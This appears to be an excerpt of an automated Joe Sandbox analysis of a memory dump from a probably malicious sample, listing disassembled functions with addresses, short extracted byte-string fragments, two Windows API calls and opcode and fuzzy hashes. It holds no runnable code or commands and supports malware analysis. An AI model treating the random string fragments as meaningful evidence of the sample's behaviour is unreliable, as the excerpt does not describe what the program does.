Y=n?, xrefs: 00416F26, 00416E50, 00416E7F
\, xrefs: 00416EBD
Y=n?, xrefs: 00416CBE

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: Y=n?$Y=n?$\
API String ID: 0-1148525055
Opcode ID: 3b6940478bfb522716c6abf886b5fa7f5b638e6a56157606f5a2d7110563bcb5
Instruction ID: d631f8773df64762f5f13e102b32d6de0376f76cb16f6785bdec6563801ec1c3
Opcode Fuzzy Hash: 3b6940478bfb522716c6abf886b5fa7f5b638e6a56157606f5a2d7110563bcb5
Instruction Fuzzy Hash: DDE122766083518FC310CF24C8912ABBBE2FFD9314F0A8A6DE4C95B351D7399946CB96

Function 00417193 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 561COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417444
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 004174E3

Strings

7$&., xrefs: 00417640
3wA, xrefs: 0041772D

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 3wA$7$&.
API String ID: 237503144-4200240528
Opcode ID: d7567aafd26a5b6ec08765d21677a9bc00fcbcdea9aaf1cd81594bde76293840
Instruction ID: 8a99b0927b43636473126fa4c79d97a44fc09134ac2767abdde0108cd9a69b93
Opcode Fuzzy Hash: d7567aafd26a5b6ec08765d21677a9bc00fcbcdea9aaf1cd81594bde76293840
Instruction Fuzzy Hash: DA0205755083518BC324CF29C8906ABB7F2FFD9314F098A6DE8C99B391EB388941C756

Function 004249D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 214COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00424AE1
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00424B69

Strings

Ikd%, xrefs: 00424B32, 00424B56
Ikd%, xrefs: 00424A60, 00424AB1

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: Ikd%$Ikd%
API String ID: 237503144-3983221050
Opcode ID: 5088d75347c20790919e442be4affb35d75d0c45d6a29c6c6a5ac613d2cc120a
Instruction ID: 2e0c19c9d1a62baff96f1739691ebab1e8852c0fae1d023f0a69f627e73021e4
Opcode Fuzzy Hash: 5088d75347c20790919e442be4affb35d75d0c45d6a29c6c6a5ac613d2cc120a
Instruction Fuzzy Hash: 306102B954C3618FD320CF55D88075BBBA1FFD2705F04892DE9A95B381D7B1980ACB86

Function 0042966F Relevance: 6.7, Strings: 5, Instructions: 475COMMON

Download Yara Rule

Strings

nA, xrefs: 00429D53
EYAB, xrefs: 00429D43
tsF}, xrefs: 00429771, 004297CA
rpvU, xrefs: 00429D4B
MQIJ, xrefs: 00429D33

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: EYAB$MQIJ$nA$rpvU$tsF}
API String ID: 0-1507197092
Opcode ID: c15e6fe2dc55625c134df2f1227e070678312451725a6ca3e262cf6e30b079d9
Instruction ID: 4f6c2c83dd9d565ef0239110dcdacd47585432fef0474d853b36f2f82b818a61
Opcode Fuzzy Hash: c15e6fe2dc55625c134df2f1227e070678312451725a6ca3e262cf6e30b079d9
Instruction Fuzzy Hash: CFE146B290C3518FD324DF68D88176BB7E2AB86304F45897EE4D587292D278DD05CB8A

Function 0040A9E0 Relevance: 5.4, Strings: 4, Instructions: 383COMMON

Download Yara Rule

Strings

[]__, xrefs: 0040A9F2
&%]P, xrefs: 0040AD75
_k^e, xrefs: 0040AD9F
x~, xrefs: 0040AB78

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: &%]P$[]__$_k^e$x~
API String ID: 0-3665290950
Opcode ID: a6bfeeee6db4645cf7665ab418919b5d36954d709c15799bfb68c95a9da474fc
Instruction ID: e0cbcfc1ebcbcb89e25e183f25ebfadaa7c2bdc2511ce3a558e9f7e5a3c16b50
Opcode Fuzzy Hash: a6bfeeee6db4645cf7665ab418919b5d36954d709c15799bfb68c95a9da474fc
Instruction Fuzzy Hash: 28C1F47164C3608BC324DF2498912AFFBE39BC1304F18893DE5D56B385D67989168B97

Function 00417DC3 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

gfff, xrefs: 00417F1F
7, xrefs: 00417EF8
2h?n, xrefs: 00417ED5
SP, xrefs: 00417E6C

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: 2h?n$7$SP$gfff
API String ID: 0-2367259846
Opcode ID: b8e12a1cf0472dc148991fe6891e039bc907bb6b424e0ecd30a5ae3dc79f7e78
Instruction ID: 8f7fd299e917efcbb753f93a31626231f3579e574582a49b861f84e30dfccd7d
Opcode Fuzzy Hash: b8e12a1cf0472dc148991fe6891e039bc907bb6b424e0ecd30a5ae3dc79f7e78
Instruction Fuzzy Hash: 67515972A183114FD718CF28C8117BBB6E6EBC5314F19867EE456C73D1EA38D8468786

Function 0041A3B1 Relevance: 5.1, Strings: 4, Instructions: 60COMMON

Download Yara Rule

Strings

Uejm, xrefs: 0041A3CF
Zh9W, xrefs: 0041A3C8
Lk^a, xrefs: 0041A3C1
Rb@|, xrefs: 0041A3D6

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: Lk^a$Rb@|$Uejm$Zh9W
API String ID: 0-3482151199
Opcode ID: 1e7ce17a78c6e19156c64ff1844b54a6489614ae9176f2df3917f23a9c6263bc
Instruction ID: 721f1124d1b948b98a79feb427c458ed1bb4e632dc89954bdc30a15cb66ec46a
Opcode Fuzzy Hash: 1e7ce17a78c6e19156c64ff1844b54a6489614ae9176f2df3917f23a9c6263bc
Instruction Fuzzy Hash: 8E11E4741027429FD314CF28C064773FBA1BF56350724956DC8A38B780D738E462CB86

Function 0041BDC0 Relevance: 4.3, Strings: 3, Instructions: 553COMMON

Download Yara Rule

Strings

E()., xrefs: 0041BD41
E()., xrefs: 0041BBC0, 0041BC18, 0041BCD6
E()., xrefs: 0041C01E

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: E().$E().$E().
API String ID: 0-88612292
Opcode ID: e4f29a0149dcc20c65f92aff4b67095b577058b3d49e1aa8f509321a91d15908
Instruction ID: c7bf4fda8d2a24b24b0e881282d8578d41e4d3f8bee6e4fe8db1efdf7f184593
Opcode Fuzzy Hash: e4f29a0149dcc20c65f92aff4b67095b577058b3d49e1aa8f509321a91d15908
Instruction Fuzzy Hash: 8AE13376A583118BD324CF28CC413A7B3F2EFD6310F198A1DE9958B3A0EB799845C385

Function 00420FB0 Relevance: 4.2, Strings: 3, Instructions: 450COMMON

Download Yara Rule

Strings

2Q, xrefs: 0042114E
PQRSG\^_, xrefs: 004211BA
GF, xrefs: 00421052, 0042105A

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: GF$PQRSG\^_$2Q
API String ID: 0-3289701592
Opcode ID: f68c6d7c02f49707e1a0fd029b353b2eb99f267d41fed8eee588f94371da6c56
Instruction ID: 1be8de3f7684d10e43b1a2cbfaf5340b1c264569a0aad94e71a1fcc5e32060fd
Opcode Fuzzy Hash: f68c6d7c02f49707e1a0fd029b353b2eb99f267d41fed8eee588f94371da6c56
Instruction Fuzzy Hash: B2D1FC71A083508BD314DF69C891A6BBBE2EFD5314F04892DF8C9DB391E7B8D8058B56

Function 004096B0 Relevance: 4.1, Strings: 3, Instructions: 393COMMON

Download Yara Rule

Strings

j, xrefs: 00409818
E2AD60005361D2860522D5E87E3CC394, xrefs: 00409773
9, xrefs: 004098C5

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: 9$E2AD60005361D2860522D5E87E3CC394$j
API String ID: 0-2138816790
Opcode ID: 23cb86e19215d4eb8adae3077190cb8f464ff9fce3ab98523e584b2d8a88820b
Instruction ID: 64fb2aea90a1def07fe8735d870f40bc83607752a89702e2895ba9f2520ee3cb
Opcode Fuzzy Hash: 23cb86e19215d4eb8adae3077190cb8f464ff9fce3ab98523e584b2d8a88820b
Instruction Fuzzy Hash: 8CC157B16083808BD314DF79C89066BBBE5EFD5314F18492DE4E59B392DB38C90ACB56

Function 0042E8A9 Relevance: 3.8, Strings: 3, Instructions: 36COMMON

Download Yara Rule

Strings

h, xrefs: 0042EC02
-}e, xrefs: 0042EC31
"}e, xrefs: 0042EC07

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: "}e$-}e$h
API String ID: 0-3436826761
Opcode ID: 370f6d43e4b651407d305d2131020c6ec1f42542eb41fa35cc86591035d8759b
Instruction ID: 742aae6216b03d9cf00bba7b9f764652ce70bfa194e5519a7b5b443d28c78134
Opcode Fuzzy Hash: 370f6d43e4b651407d305d2131020c6ec1f42542eb41fa35cc86591035d8759b
Instruction Fuzzy Hash: 8DF0AF791092508BC7188F2AC95063FFFF59BCB304F096D2DE186AB251CA349800CBAB

Function 0043B789 Relevance: 3.2, Strings: 2, Instructions: 684COMMON

Download Yara Rule

Strings

., xrefs: 0043B97B
., xrefs: 0043B96A

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: .$.
API String ID: 0-3769392785
Opcode ID: 59c4ab1a53630e9853cc899b520fb0c2d5067358505897f5b3a1ca70946e0e77
Instruction ID: 3be980a59832fd12fd7003dedcb49f543ac66581970f2c25636c8f0ff0d2fbef
Opcode Fuzzy Hash: 59c4ab1a53630e9853cc899b520fb0c2d5067358505897f5b3a1ca70946e0e77
Instruction Fuzzy Hash: B222433A618312CBC7189F38D8512ABB7E2FF89310F1A987DD985873A0E778D941C785

Function 004167BD Relevance: 3.0, Strings: 2, Instructions: 512COMMON

Download Yara Rule

Strings

crb, xrefs: 0041686C
4, xrefs: 00416A7B

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: crb$4
API String ID: 0-2498948370
Opcode ID: d523540458deb64cd07bff262b1b40f2cef8d897b3c0a019504e2f94f417c368
Instruction ID: 521f4b63276fd7e254cbbc9e66187c2dfa581e2232a6fc202b772cbcbf8ffbfa
Opcode Fuzzy Hash: d523540458deb64cd07bff262b1b40f2cef8d897b3c0a019504e2f94f417c368
Instruction Fuzzy Hash: 16F157746083408BD724CF28C8607ABB7E1FF9A314F198A6EE4C697392D738D815C75A

Function 00425D67 Relevance: 2.9, Strings: 2, Instructions: 402COMMON

Download Yara Rule

Strings

raB, xrefs: 00425D94, 00425F44, 00426027, 00426159
TG, xrefs: 00425EE6

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: TG$raB
API String ID: 0-2144962817
Opcode ID: 1dabd25e1b60c7c0473853fbc7a0264621903e600b2062e687e7d59a8329df05
Instruction ID: 5af3ecdd8fe3638f7a6c97b192824f4e3c020848942bcbb3843eb82a52b12eda
Opcode Fuzzy Hash: 1dabd25e1b60c7c0473853fbc7a0264621903e600b2062e687e7d59a8329df05
Instruction Fuzzy Hash: BFD12776609722CBC324DF28D4801ABB3F2FF85340F96896DD4819B320E739AD56D785

Function 0043AF80 Relevance: 2.9, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

coh, xrefs: 0043B1C5
NP,?, xrefs: 0043B170

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: NP,?$coh
API String ID: 0-1255440635
Opcode ID: 227d87e97e7a2e2933c6c1b8c67fbb2fe951f173830de8df3a4e4e545487c755
Instruction ID: 516d6541154a56af6b6c9f30f8e40a9be38cafa4bc3c70ad790a712a8b70bf3e
Opcode Fuzzy Hash: 227d87e97e7a2e2933c6c1b8c67fbb2fe951f173830de8df3a4e4e545487c755
Instruction Fuzzy Hash: 8E9169316043049BD724CF258884B3BB3A2EB8D368F14A72EE6A5073D1D739EC0587DA

Function 0041BACA Relevance: 2.8, Strings: 2, Instructions: 280COMMON

Download Yara Rule

Strings

E()., xrefs: 0041BD41
E()., xrefs: 0041BBC0, 0041BC18, 0041BCD6

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: E().$E().
API String ID: 0-156866491
Opcode ID: 2418af985520421a009449f3840ed4374082b7503b2730e81e9b510a92bf5a55
Instruction ID: 67fe6dc181ed71bb6dcaf4a175d2087da0ccb3482ab87501727f2eb32c009e7b
Opcode Fuzzy Hash: 2418af985520421a009449f3840ed4374082b7503b2730e81e9b510a92bf5a55
Instruction Fuzzy Hash: 9B613476A083118BD324CF28C8513ABB3F2EFD5310F18891DE8958B3A5FB799945C395

Function 0043ACEA Relevance: 2.7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043AD30
NP,?, xrefs: 0043ADB0

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: NP,?$NP,?
API String ID: 0-4096726916
Opcode ID: 5d200ace6dcbe07585eeb874b07d6f5728913ec9d788527a6c9f1a2c628ea6a4
Instruction ID: f3e471e06233bb9004da985c1d6c88506715d0d06a3dc276bfb2ed6d71bb62f7
Opcode Fuzzy Hash: 5d200ace6dcbe07585eeb874b07d6f5728913ec9d788527a6c9f1a2c628ea6a4
Instruction Fuzzy Hash: 2261DF75A44101DBDB18CF54EC41B3FB372FB4E319F205129E156972A1D739AC22CB5A

Function 00414BBB Relevance: 1.8, Strings: 1, Instructions: 527COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00414C10

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: cc5b98a4500ef96277daab399b6d24623f0d723d888a0a62594a4801d826d2f0
Instruction ID: 0c6960b673e03e930f33ebd13f1035c1551921e6dae1087b45409d12404cce9d
Opcode Fuzzy Hash: cc5b98a4500ef96277daab399b6d24623f0d723d888a0a62594a4801d826d2f0
Instruction Fuzzy Hash: 1AF1117A618200EBEB148F14EC01B3B73A2FB8A318F55453DF545572E2DB35AC528B9A

Function 00426C74 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

IJK, xrefs: 00427100

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: IJK
API String ID: 0-3213658286
Opcode ID: dc79442df6af788f623d2970491c0b1bc1009ed8a258706e27aa37d717f68e81
Instruction ID: 9118b6096c1e568c8abf349474ef0e5c4993a6111839e098f6f49c7a9d2e65bc
Opcode Fuzzy Hash: dc79442df6af788f623d2970491c0b1bc1009ed8a258706e27aa37d717f68e81
Instruction Fuzzy Hash: AAE100B561C340DFE7248F29EC4176BBBA2FBC6304F54892DE5C5873A1EB3498068B56

Function 0042C710 Relevance: 1.7, Strings: 1, Instructions: 409COMMON

Download Yara Rule

Strings

", xrefs: 0042CA08

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: e90c43f279bec9d4fabb314b38b2ee7cc28af427a76ebedaaad37435733619b5
Instruction ID: f481ff3c11aeb2a91243dd29903d336b3b9da2458be1e4fa405f2feaae30cd29
Opcode Fuzzy Hash: e90c43f279bec9d4fabb314b38b2ee7cc28af427a76ebedaaad37435733619b5
Instruction Fuzzy Hash: BAD1F4B1B083255BC714CE25E48176FB7E5AF88314F58896EE8858B382D778DD44CBCA

Function 004262F7 Relevance: 1.6, Strings: 1, Instructions: 399COMMON

Download Yara Rule

Strings

BhB, xrefs: 0042683C

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: BhB
API String ID: 0-3114877359
Opcode ID: 06ca21ac9ccd6e80b0320b5765de087d5ff2bc55ef0db296c742dc6ec475b4e5
Instruction ID: c3564d7287cf9fae5eede37b7254edbf6a821b410e420be96a255b09532fd94b
Opcode Fuzzy Hash: 06ca21ac9ccd6e80b0320b5765de087d5ff2bc55ef0db296c742dc6ec475b4e5
Instruction Fuzzy Hash: 54C1803264C7A18BC330CE6894412EBB7D2DF94310F9A863FC9D587381E63C9905D39A

Function 0041C09C Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

W^, xrefs: 0041C165

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: W^
API String ID: 0-2466450439
Opcode ID: 6ba8940e367817fab2a5e5ac6b0685d4b09dd2d2f61f92ce46f09cc2d11b4e0f
Instruction ID: a313ad45dde874eaf5d30079da4962b62086a085e0c754acc235117a7a5adfbe
Opcode Fuzzy Hash: 6ba8940e367817fab2a5e5ac6b0685d4b09dd2d2f61f92ce46f09cc2d11b4e0f
Instruction Fuzzy Hash: FD51EBB054C350CBD700CF64C8916ABBBF1EFA6318F14895DE4C48B3A1E2399941CB1A

Function 004272D8 Relevance: 1.4, Strings: 1, Instructions: 187COMMON

Download Yara Rule

Strings

;, xrefs: 0042749E

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 530f89ab603470a87c8562acbd76893284863a0377598838b6b4628f62ae0ab1
Instruction ID: a8c6ce6fea673b87ef737a0610734c0c8dea8479508298c82df54ec23843e614
Opcode Fuzzy Hash: 530f89ab603470a87c8562acbd76893284863a0377598838b6b4628f62ae0ab1
Instruction Fuzzy Hash: D5519E2174C3618ED3209B28A880267BBD1DF95354F89867EDDD50B3D2D33D990DE39A

Function 0043E7AE Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

Xl[r, xrefs: 0043E9D2

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: Xl[r
API String ID: 0-2306104986
Opcode ID: c5ea2fbd8f6049e790a7e419e49aaa638bbb15a6e5d01eb94abb9b19c25ebd73
Instruction ID: 7233cf555f065de6086de5b119bab9c6ca559650c0b2e790c7a1d83271f50140
Opcode Fuzzy Hash: c5ea2fbd8f6049e790a7e419e49aaa638bbb15a6e5d01eb94abb9b19c25ebd73
Instruction Fuzzy Hash: 72516776D206008FD714CF76DD4256A7FB2EB96315B29917ED801AB3B2E6398800CF68

Function 00429665 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

gd, xrefs: 0042959D

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID: gd
API String ID: 0-565856990
Opcode ID: 4bec12dcb0fc8280b8f122203fd52d990346774ee1cc63351c27d993926426f1
Instruction ID: 2d387d4f93aa55f48b28e7ddaf0e02c356338a64bf8708b0e1c40ba5bbf6ca13
Opcode Fuzzy Hash: 4bec12dcb0fc8280b8f122203fd52d990346774ee1cc63351c27d993926426f1
Instruction Fuzzy Hash: A141CFB06087159BD3199F25D86272BB7F1EF92340F84585DF4828F7A1E37C8A45C3AA

Function 0043D9D0 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

z|B, xrefs: 0043D9EE, 0043DA1A

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID: InitializeThunk
String ID: z|B
API String ID: 2994545307-3179225810
Opcode ID: 5d2266026a3f0310c5b4f9b41fd88fa7304bbf7ed41d8f79afa12ab64f937baa
Instruction ID: c955aca6311ad02cc484148c1f3c29255bee8882449d83fc1b81a548c2886611
Opcode Fuzzy Hash: 5d2266026a3f0310c5b4f9b41fd88fa7304bbf7ed41d8f79afa12ab64f937baa
Instruction Fuzzy Hash: 7EF0F9769482086BD3215F09ED40D37B3BEEB8E76CF10132AF555122A1E326ED2197A9

Function 004407FD Relevance: .6, Instructions: 631COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28ad62fb266097460350fbe3675dc3c5a17d820a04870d3c1ccd81f19782a29d
Instruction ID: a03b5a702d76a0960f0a17408d22cda26e65a2c8cfc74d376e0ecaaa4f307326
Opcode Fuzzy Hash: 28ad62fb266097460350fbe3675dc3c5a17d820a04870d3c1ccd81f19782a29d
Instruction Fuzzy Hash: 2F12123A758210CFD304CF28E89062AB3E1FB8E315F1A88BDD98587351E779D961DB46

Function 00407490 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc1eef18fdf644b06da1de97aa18fadef646f7928235d19c95e7a36c8b9e78f
Instruction ID: 49734b3277d0901fe1b2048da2a3efea1b21b17d7a16ccb058c5a45e0afe455f
Opcode Fuzzy Hash: 5cc1eef18fdf644b06da1de97aa18fadef646f7928235d19c95e7a36c8b9e78f
Instruction Fuzzy Hash: E422A072A0C7118BD725DF18D9806ABB3E1BBC4319F19893ED9C6A7381D738B8518B47

Function 00440910 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2538268434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2538268434.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_EZsrFTi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d93610cf21678855d35fe22b809f0e265b3903e91817f92e5c0fe995c991119a
Instruction ID: 33c46f4f732799f4fba10ecd681db7fa28b54c64bc3e53837c86cc8c6502007d
Opcode Fuzzy Hash: d93610cf21678855d35fe22b809f0e265b3903e91817f92e5c0fe995c991119a
Instruction Fuzzy Hash: 0C02103A758310CFD304CF38E89062AB7E1FBCA314F1A88BDD98587351E6799961CB46

Function 00405930 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

